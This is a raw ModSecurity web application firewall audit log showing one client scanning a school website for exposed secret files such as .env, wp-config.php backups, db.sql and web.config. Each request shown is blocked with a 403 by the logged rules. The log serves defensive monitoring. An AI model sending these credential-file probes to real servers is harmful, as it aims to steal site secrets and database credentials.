Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--69107773-Z--
--0a439825-A--
[18/Apr/2025:14:06:11 +0700] aAH54xk6uTiIdxrJEEQXdwAAAMg 103.236.140.4 59596 103.236.140.4 8181
--0a439825-B--
GET /config/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--0a439825-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0a439825-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744959971548558 823 (- - -)
Stopwatch2: 1744959971548558 823; combined=313, p1=279, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0a439825-Z--
--5771b80a-A--
[18/Apr/2025:14:06:11 +0700] aAH54xk6uTiIdxrJEEQXeQAAAME 103.236.140.4 59602 103.236.140.4 8181
--5771b80a-B--
GET /.env.production HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--5771b80a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5771b80a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744959971791388 808 (- - -)
Stopwatch2: 1744959971791388 808; combined=302, p1=267, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5771b80a-Z--
--2977765e-A--
[18/Apr/2025:14:06:26 +0700] aAH58lyj-eUTITfvHEWQGQAAABE 103.236.140.4 59802 103.236.140.4 8181
--2977765e-B--
GET /wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--2977765e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2977765e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744959986912496 837 (- - -)
Stopwatch2: 1744959986912496 837; combined=338, p1=296, p2=0, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2977765e-Z--
--904dd42e-A--
[18/Apr/2025:14:06:27 +0700] aAH58zlhhbF_BYhFYTVGIgAAAFY 103.236.140.4 59810 103.236.140.4 8181
--904dd42e-B--
GET /symfony/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--904dd42e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--904dd42e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744959987155477 758 (- - -)
Stopwatch2: 1744959987155477 758; combined=293, p1=260, p2=0, p3=0, p4=0, p5=32, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--904dd42e-Z--
--a0a4c337-A--
[18/Apr/2025:14:06:27 +0700] aAH58zlhhbF_BYhFYTVGJAAAAEQ 103.236.140.4 59814 103.236.140.4 8181
--a0a4c337-B--
GET /django/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--a0a4c337-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a0a4c337-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744959987398315 802 (- - -)
Stopwatch2: 1744959987398315 802; combined=299, p1=262, p2=0, p3=0, p4=0, p5=36, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a0a4c337-Z--
--3402f619-A--
[18/Apr/2025:14:06:27 +0700] aAH58zpR4B6O-aqWibMrbgAAAI4 103.236.140.4 59820 103.236.140.4 8181
--3402f619-B--
GET /flask/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--3402f619-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3402f619-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744959987641132 898 (- - -)
Stopwatch2: 1744959987641132 898; combined=326, p1=287, p2=0, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3402f619-Z--
--c9be5304-A--
[18/Apr/2025:14:06:27 +0700] aAH58zlhhbF_BYhFYTVGJgAAAEg 103.236.140.4 59822 103.236.140.4 8181
--c9be5304-B--
GET /next/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--c9be5304-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c9be5304-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744959987883915 846 (- - -)
Stopwatch2: 1744959987883915 846; combined=320, p1=276, p2=0, p3=0, p4=0, p5=44, sr=117, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c9be5304-Z--
--de89f96e-A--
[18/Apr/2025:14:06:28 +0700] aAH59Bk6uTiIdxrJEEQXkAAAAM0 103.236.140.4 59834 103.236.140.4 8181
--de89f96e-B--
GET /nuxt/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--de89f96e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--de89f96e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744959988126721 753 (- - -)
Stopwatch2: 1744959988126721 753; combined=268, p1=237, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--de89f96e-Z--
--1395e674-A--
[18/Apr/2025:14:06:28 +0700] aAH59Bk6uTiIdxrJEEQXkQAAAMc 103.236.140.4 59836 103.236.140.4 8181
--1395e674-B--
GET /react/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--1395e674-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1395e674-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744959988369579 809 (- - -)
Stopwatch2: 1744959988369579 809; combined=299, p1=264, p2=0, p3=0, p4=0, p5=34, sr=73, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1395e674-Z--
--04aec923-A--
[18/Apr/2025:14:06:28 +0700] aAH59Fyj-eUTITfvHEWQGgAAAA8 103.236.140.4 59838 103.236.140.4 8181
--04aec923-B--
GET /db.sql HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--04aec923-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--04aec923-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744959988614265 2629 (- - -)
Stopwatch2: 1744959988614265 2629; combined=941, p1=407, p2=498, p3=0, p4=0, p5=36, sr=105, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--04aec923-Z--
--664ec06b-A--
[18/Apr/2025:14:06:41 +0700] aAH6ATlhhbF_BYhFYTVGOAAAAEM 103.236.140.4 59974 103.236.140.4 8181
--664ec06b-B--
GET /config.php.old HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--664ec06b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--664ec06b-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744960001234111 3254 (- - -)
Stopwatch2: 1744960001234111 3254; combined=959, p1=482, p2=444, p3=0, p4=0, p5=33, sr=129, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--664ec06b-Z--
--74b84072-A--
[18/Apr/2025:14:06:43 +0700] aAH6AzlhhbF_BYhFYTVGOwAAAE4 103.236.140.4 60002 103.236.140.4 8181
--74b84072-B--
GET /wp-config.php.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--74b84072-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--74b84072-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744960003881264 841 (- - -)
Stopwatch2: 1744960003881264 841; combined=337, p1=304, p2=0, p3=0, p4=0, p5=33, sr=110, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--74b84072-Z--
--92752067-A--
[18/Apr/2025:14:06:44 +0700] aAH6BDlhhbF_BYhFYTVGPAAAAEE 103.236.140.4 60008 103.236.140.4 8181
--92752067-B--
GET /.env.save HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--92752067-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--92752067-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744960004124214 764 (- - -)
Stopwatch2: 1744960004124214 764; combined=271, p1=237, p2=0, p3=0, p4=0, p5=34, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--92752067-Z--
--321ae41e-A--
[18/Apr/2025:14:06:44 +0700] aAH6BDlhhbF_BYhFYTVGPgAAAFE 103.236.140.4 60014 103.236.140.4 8181
--321ae41e-B--
GET /web.config HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--321ae41e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--321ae41e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744960004367045 823 (- - -)
Stopwatch2: 1744960004367045 823; combined=320, p1=284, p2=0, p3=0, p4=0, p5=35, sr=75, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--321ae41e-Z--
--4a22d223-A--
[18/Apr/2025:14:06:44 +0700] aAH6BDlhhbF_BYhFYTVGPwAAAFU 103.236.140.4 60016 103.236.140.4 8181
--4a22d223-B--
GET /cp/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--4a22d223-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4a22d223-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744960004609864 727 (- - -)
Stopwatch2: 1744960004609864 727; combined=309, p1=278, p2=0, p3=0, p4=0, p5=31, sr=118, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4a22d223-Z--
--d1559874-A--
[18/Apr/2025:14:06:44 +0700] aAH6BDlhhbF_BYhFYTVGQAAAAEY 103.236.140.4 60018 103.236.140.4 8181
--d1559874-B--
GET /core/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--d1559874-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d1559874-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744960004852577 643 (- - -)
Stopwatch2: 1744960004852577 643; combined=274, p1=247, p2=0, p3=0, p4=0, p5=27, sr=106, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d1559874-Z--
--31753901-A--
[18/Apr/2025:14:06:45 +0700] aAH6BTlhhbF_BYhFYTVGQgAAAFA 103.236.140.4 60024 103.236.140.4 8181
--31753901-B--
GET /conf/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--31753901-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--31753901-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744960005095307 814 (- - -)
Stopwatch2: 1744960005095307 814; combined=306, p1=270, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--31753901-Z--
--58742843-A--
[18/Apr/2025:14:06:45 +0700] aAH6BTlhhbF_BYhFYTVGQwAAAEc 103.236.140.4 60026 103.236.140.4 8181
--58742843-B--
GET /server/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
